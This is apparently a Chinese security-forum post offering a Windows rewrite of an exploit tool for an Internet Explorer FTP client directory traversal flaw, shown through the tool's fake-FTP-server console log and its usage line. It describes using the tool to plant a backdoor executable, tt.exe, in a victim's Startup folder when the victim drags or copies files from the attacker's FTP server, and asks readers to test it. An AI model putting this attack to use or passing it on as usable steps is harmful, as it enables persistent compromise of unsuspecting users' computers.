• 当前位置:首页>>编程开发A>>安全防御>>Internet Explorer FTP Client Directory Traversal利用工具
  • Internet Explorer FTP Client Directory Traversal利用工具
  • 漏洞详细描述见下面地址:
    http://www.securiteam.com/windowsntfocus/5NP0615EKM.html

    上面提供了*nix下的exloit,我重写了部分代码,改写成了win下的。彻骨内需运行后如下:
    H:\temp\lcc\lcc>ftpexp tt.exe d:\tt.exe
            Internet Explorer FTP download path disclosure prof of concept
              rewrritten by 无敌最寂寞[EST]

    fake ftp server is preparing to start...
    now fake ftp server listened on local port 21!!

    >> USER anonymous
    >> PASS IEUser@
    >> opts utf8 on
    >> syst
    >> site help
    >> PWD
    >> noop
    >> CWD /
    >> TYPE A
    >> PORT 10,10,111,111,10,224
    >> LIST
    >> noop
    >> CWD /


    使用方法如下:


    H:\temp\lcc\lcc>ftpexp
            Internet Explorer FTP download path disclosure prof of concept
              rewrritten by 无敌最寂寞[EST]

           Usage:ftpexp <local_file> <remote_file>


    根据漏洞描述,当目标访问你的ftp 服务器时,如果有以下两个错误就会触发攻击:

    * 右击文件-》“复制到文件夹”
    * 托放

    攻击模式如下:
    比如你想把一个后门程序tt.exe传到目标机器上的启动目录里,那么你可以这样构造你的ftp服务器:

    H:\temp\lcc\lcc>ftpexp .\tt.exe C:\Documents and Settings\All Users\「开始」菜单\程序\启动\tt.exe

    然后如果对方访问你的这个ftp服务器的话,不管他采取了上面哪个操作,tt.exe这个文件都会复制到它的启动目录里。

    我没有测试,请各位朋友帮忙测试一下吧。
  • 上一篇:Internet Explorer XP SP2 Remote Compromise漏洞测试手记
    下一篇:NTFS格式分区下实现提升权限的一些方法和思路